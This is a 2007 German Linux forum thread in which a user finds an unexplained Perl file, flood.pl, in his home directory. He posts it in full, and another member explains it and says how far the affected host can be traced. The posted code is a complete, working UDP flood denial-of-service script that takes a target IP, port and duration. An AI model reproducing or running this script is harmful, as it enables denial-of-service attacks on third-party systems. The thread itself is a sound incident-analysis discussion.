merkwürdiges Script im Home-Verzeichnis

Antworten
Nachricht
Autor
micbur
Beiträge: 86
Registriert: 05. Jun 2004 15:55

merkwürdiges Script im Home-Verzeichnis

#1 Beitrag von micbur » 07. Mai 2007 9:34

Hallo,

ich sichere meinen Rechner immer, wenn ich den Platz verlasse, sodass ich mich abmelden muss. Nun gibt es in meinem Homeverzeichnis eine Datei namens flood.pl und mit ausführbaren Rechten für 'world' und mit meiner Nutzer-ID und -Gruppe.

Kann mir einer erklären, was jemand davon hat, wenn er auf meinem Rechner dieses Scipt ausführt? Ich kann kein Perl.

[edit: ich habe das nicht da hin gepackt, das weiß ich genau, weil: ich kann kein Perl und habe auch nach keinem Script gesucht oder so]

Code: Alles auswählen

#!/usr/bin/perl
################################################## ###
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
################################################## ####

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit&#40;1&#41;;
&#125;

my &#40;$ip,$port,$size,$time&#41;;
$ip=$ARGV&#91;0&#93;;
$port=$ARGV&#91;1&#93;;
$time=$ARGV&#91;2&#93;;

socket&#40;crazy, PF_INET, SOCK_DGRAM, 17&#41;;
$iaddr = inet_aton&#40;"$ip"&#41;;

printf "udp flood - odix\n";

if &#40;$ARGV&#91;1&#93; ==0 && $ARGV&#91;2&#93; ==0&#41; &#123;
goto randpackets;
&#125;
if &#40;$ARGV&#91;1&#93; !=0 && $ARGV&#91;2&#93; !=0&#41; &#123;
system&#40;"&#40;sleep $time;killall -9 udp&#41; &"&#41;;
goto packets;
&#125;
if &#40;$ARGV&#91;1&#93; !=0 && $ARGV&#91;2&#93; ==0&#41; &#123;
goto packets;
&#125;
if &#40;$ARGV&#91;1&#93; ==0 && $ARGV&#91;2&#93; !=0&#41; &#123;
system&#40;"&#40;sleep $time;killall -9 udp&#41; &"&#41;;
goto randpackets;
&#125;

packets&#58;
for &#40;;;&#41; &#123;
$size=$rand x $rand x $rand;
send&#40;crazy, 0, $size, sockaddr_in&#40;$port, $iaddr&#41;&#41;;
&#125;

randpackets&#58;
for &#40;;;&#41; &#123;
$size=$rand x $rand x $rand;
$port=int&#40;rand 65000&#41; +1;
send&#40;crazy, 0, $size, sockaddr_in&#40;$port, $iaddr&#41;&#41;;
&#125;
Ciao, micbur
Nach oben
Benutzeravatar
Janka
Beiträge: 3585
Registriert: 11. Feb 2006 19:10

#2 Beitrag von Janka » 07. Mai 2007 11:19

Das was oben drin steht. UDP-Pakete an eine bestimmte IP, beginnend mit einem bestimmten Startport schicken. Bringt NFS, SMB (nicht CIFS), VPNs und einige andere Dienste durcheinander.

Deshalb wird in einem gut gewarteten Netzwerk den normalen Benutzern auch verboten, UDP-Pakete zu verschicken.

Janka
Ich vertonne Spam immer in /dev/dsp statt /dev/null.
Ich mag die Schreie.
Nach oben
micbur
Beiträge: 86
Registriert: 05. Jun 2004 15:55

#3 Beitrag von micbur » 07. Mai 2007 12:08

Also löschen.

Habe ich noch ein Chance herauszubekommen, wen es getroffen hat?

Ciao, micbur
Nach oben
Benutzeravatar
Janka
Beiträge: 3585
Registriert: 11. Feb 2006 19:10

#4 Beitrag von Janka » 08. Mai 2007 10:38

micbur hat geschrieben:Habe ich noch ein Chance herauszubekommen, wen es getroffen hat?
Kommt auf die Logeinstellungen deines Paketfilters an. Normalerweise werden ausgehende Pakete aber nicht geloggt, weil das das Logfile zumüllen würde.

Janka
Ich vertonne Spam immer in /dev/dsp statt /dev/null.
Ich mag die Schreie.
Nach oben
Antworten

Zurück zu „Sicherheit“